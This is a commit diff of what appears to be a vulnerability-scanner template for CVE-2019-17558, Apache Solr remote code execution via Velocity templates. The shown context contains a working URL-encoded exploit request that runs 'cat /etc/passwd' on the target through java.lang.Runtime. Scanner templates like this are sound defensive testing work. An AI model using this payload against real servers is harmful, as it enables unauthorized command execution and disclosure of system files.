Update CVE-2019-17558.yaml
parent
6d1789ff76
commit
39cfec87ae
|
@ -5,7 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: critical
|
||||
|
||||
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 <--good reference and it works
|
||||
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
|
||||
|
||||
|
@ -36,6 +36,7 @@ requests:
|
|||
|
||||
# RCE via velocity template:
|
||||
# Get /etc/passwd
|
||||
|
||||
- |
|
||||
GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
|
Loading…
Reference in New Issue